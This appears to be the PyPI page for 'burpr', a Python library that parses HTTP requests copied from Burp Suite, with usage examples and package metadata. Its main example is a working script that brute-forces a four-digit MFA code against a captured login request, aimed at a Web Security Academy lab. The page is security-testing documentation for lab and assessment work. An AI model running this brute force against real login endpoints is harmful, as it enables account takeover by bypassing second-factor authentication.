# What is it
A parser for requests copied from Burp Suite, intended to help assess an application's security functionality.
# Why I wrote it
To use requests captured in Burp Suite without relying on Burp Intruder.
# Installation
```
pip install burpr
```
# Usage
Use the burpr.py module to parse a request copied from Burp Suite, then use the resulting object to read or modify its headers and body.
Requests can be parsed from a string or from a .txt file.
```python
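import burpr
import httpx  # the client used to send the request at the end of this snippet

# Load from string (req_string holds the raw request text copied from Burp Suite) ...
req = burpr.parse_string(req_string)
# ... or load from file; use whichever of the two loaders fits, not both
req = burpr.parse_file(req_file_path)

# clone the request so the parsed original stays untouched
req_clone = burpr.clone(req)

# change protocol to http1.1
req_clone.set_protocol(burpr.protocols.HTTP1_1)
# change transport to http
req_clone.set_transport(burpr.transports.HTTP)

# modify the header
req_clone.set_header("Cookie", "session=modified_session_cookie")
# modify the parameter
req_clone.set_parameter("post-param", "AAABBBCCC")

# remove parameter
req_clone.remove_parameter("post-param")
# remove header
req_clone.remove_header("Cookie")

# adjust Content-Length for parameter change
burpr.prepare(req_clone)

# Send the modified clone rather than the original `req`; otherwise none of the
# edits above reach the wire. is_http2 presumably follows set_protocol(), which
# keeps the client in step with the protocol chosen for the clone (confirm
# against the burpr version in use).
client = httpx.Client(http2=req_clone.is_http2)
res = client.post(req_clone.url, headers=req_clone.headers, data=req_clone.body)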
```
# Examples
## Brute force broken MFA
```python
import burpr
import httpx
import itertools
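# Request captured in Burp Suite and pasted verbatim. The host and session
# values are redacted placeholders (xxxx).
# The empty line after the last header separates headers from the body; without
# it the body line would be read as one more header. Content-Length: 13 is the
# length of the body "mfa-code=4321".
burp_request = r"""POST /login2 HTTP/2
Host: xxxx.web-security-academy.net
Cookie: verify=carlos; session=xxxx
Content-Length: 13
Cache-Control: max-age=0
Sec-Ch-Ua:
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: ""
Upgrade-Insecure-Requests: 1
Origin: https://xxxx.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://xxxx.web-security-academy.net/login2
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

mfa-code=4321
"""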
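def generate_pin_numbers():
    """Return every four-digit code from "0000" to "9999" as a list of strings.

    The codes are produced in ascending order and keep their leading zeros,
    so the list always holds exactly 10,000 entries of length four.
    """
    # product() over the digit characters yields 4-tuples of one-character
    # strings, which can be joined directly without converting each digit.
    return ["".join(digits) for digits in itertools.product("0123456789", repeat=4)]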
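def brute_force_broken_mfa():
    """Submit each four-digit code with the captured /login2 request until the status changes.

    The captured request is parsed once and its ``mfa-code`` parameter is
    overwritten for every candidate. Each attempt prints the response status
    and the code that was sent. The loop stops at the first response whose
    status is not 200 -- presumably the redirect issued after a correct code;
    confirm against the target's actual behaviour.

    The search space is only 10,000 values, so the loop runs to completion
    only against an endpoint that places no limit on code submissions for a
    session. Per-session attempt limits, invalidating the code after a few
    failures, and alerting on bursts of failed verifications each stop it
    early.
    """
    # Parse request from string
    req = burpr.parse_string(burp_request)

    # Create the HTTP client for the protocol the captured request used; the
    # context manager closes the client's connections when the loop finishes.
    with httpx.Client(http2=req.is_http2) as client:
        for pin in generate_pin_numbers():
            # Modify the mfa-code parameter. Every candidate is four digits,
            # so the body length stays at the captured Content-Length of 13.
            req.set_parameter("mfa-code", pin)

            # Send the request
            res = client.post(req.url, headers=req.headers, data=req.body)
            print(res.status_code, pin)

            if res.status_code != 200:
                break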
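# Run the example only when the file is executed as a script, so that importing
# it from another module does not start sending requests.
if __name__ == "__main__":
    brute_force_broken_mfa()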
```
Raw data
{
"_id": null,
"home_page": "https://github.com/krystianbajno/burpr",
"name": "burpr",
"maintainer": "",
"docs_url": null,
"requires_python": "",
"maintainer_email": "",
"keywords": "burp suite burpsuite request parser",
"author": "Krystian Bajno",
"author_email": "krystian.bajno@gmail.com",
"download_url": "https://files.pythonhosted.org/packages/2e/97/02cc2787d4784f9f1eeae1954972202775a0fb8eb866f90b3c6ae4c1d7e1/burpr-0.0.4.tar.gz",
"platform": null,
"description": "# What is it\r\nA Burp Suite request parser, used for aid in assessing application security functionality.\r\n\r\n# Why I wrote it\r\nTo use Burp Suite captured requests without relying on intruder.\r\n\r\n# Installation\r\n```\r\npip install burpr\r\n```\r\n\r\n# Usage\r\nUse burpr.py module to parse the Burp Suite copied request. Then use the created object to extract headers and body.\r\n\r\nSupports parsing requests as strings and as .txt files.\r\n\r\n```python\r\nimport burpr\r\n\r\n# Load from string\r\nreq = burpr.parse_string(req_string)\r\n\r\n# Load from file\r\nreq = burpr.parse_file(req_file_path)\r\n\r\n# clone the request\r\nreq_clone = burpr.clone(req)\r\n\r\n# change protocol to http1.1\r\nreq_clone.set_protocol(burpr.protocols.HTTP1_1)\r\n\r\n# change transport to http\r\nreq_clone.set_transport(burpr.transports.HTTP)\r\n\r\n# modify the header\r\nreq_clone.set_header(\"Cookie\", \"session=modified_session_cookie\")\r\n\r\n# modify the parameter\r\nreq_clone.set_parameter(\"post-param\", \"AAABBBCCC\")\r\n\r\n# remove parameter\r\nreq_clone.remove_parameter(\"post-param\")\r\n\r\n# remove header\r\nreq_clone.remove_header(\"Cookie\")\r\n\r\n# adjust Content-Length for parameter change\r\nburpr.prepare(req_clone)\r\n\r\nclient = httpx.Client(http2=True)\r\nres = client.post(req.url, headers=req.headers, data=req.body)\r\n```\r\n\r\n# Examples\r\n## Brute force broken MFA\r\n```python\r\nimport burpr\r\nimport httpx\r\nimport itertools\r\n\r\nburp_request = r\"\"\"POST /login2 HTTP/2\r\nHost: xxxx.web-security-academy.net\r\nCookie: verify=carlos; session=xxxx\r\nContent-Length: 13\r\nCache-Control: max-age=0\r\nSec-Ch-Ua: \r\nSec-Ch-Ua-Mobile: ?0\r\nSec-Ch-Ua-Platform: \"\"\r\nUpgrade-Insecure-Requests: 1\r\nOrigin: https://xxxx.web-security-academy.net\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 
Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\r\nSec-Fetch-Site: same-origin\r\nSec-Fetch-Mode: navigate\r\nSec-Fetch-User: ?1\r\nSec-Fetch-Dest: document\r\nReferer: https://xxxx.web-security-academy.net/login2\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\n\r\nmfa-code=4321\r\n\"\"\"\r\n\r\ndef generate_pin_numbers():\r\n return [''.join(list([str(digit) for digit in permutation])) \r\n for permutation in itertools.product(list(range(0, 10)), repeat=4)]\r\n\r\ndef brute_force_broken_mfa():\r\n # Parse request from string\r\n req = burpr.parse_string(burp_request)\r\n\r\n # Create http client and check the protocol used\r\n client = httpx.Client(http2=req.is_http2)\r\n\r\n for pin in generate_pin_numbers():\r\n # Modify the mfa-code parameter\r\n req.set_parameter(\"mfa-code\", pin)\r\n\r\n # Send the request\r\n res = client.post(req.url, headers=req.headers, data=req.body)\r\n\r\n print(res.status_code, pin)\r\n \r\n if (res.status_code != 200):\r\n break\r\n\r\nbrute_force_broken_mfa()\r\n```\r\n",
"bugtrack_url": null,
"license": "MIT",
"summary": "A Burp Suite request parser, used for aid in assessing application security functionality.",
"version": "0.0.4",
"project_urls": {
"Homepage": "https://github.com/krystianbajno/burpr"
},
"split_keywords": [
"burp",
"suite",
"burpsuite",
"request",
"parser"
],
"urls": [
{
"comment_text": "",
"digests": {
"blake2b_256": "2e9702cc2787d4784f9f1eeae1954972202775a0fb8eb866f90b3c6ae4c1d7e1",
"md5": "69786ea7c4c7ebcc5f15180f407b125e",
"sha256": "d575d0050ce70f20d50420137aaad72faf2930e658ee2a134c5657bf9403a63c"
},
"downloads": -1,
"filename": "burpr-0.0.4.tar.gz",
"has_sig": false,
"md5_digest": "69786ea7c4c7ebcc5f15180f407b125e",
"packagetype": "sdist",
"python_version": "source",
"requires_python": null,
"size": 4717,
"upload_time": "2023-09-09T16:30:10",
"upload_time_iso_8601": "2023-09-09T16:30:10.182829Z",
"url": "https://files.pythonhosted.org/packages/2e/97/02cc2787d4784f9f1eeae1954972202775a0fb8eb866f90b3c6ae4c1d7e1/burpr-0.0.4.tar.gz",
"yanked": false,
"yanked_reason": null
}
],
"upload_time": "2023-09-09 16:30:10",
"github": true,
"gitlab": false,
"bitbucket": false,
"codeberg": false,
"github_user": "krystianbajno",
"github_project": "burpr",
"travis_ci": false,
"coveralls": false,
"github_actions": false,
"requirements": [],
"lcname": "burpr"
}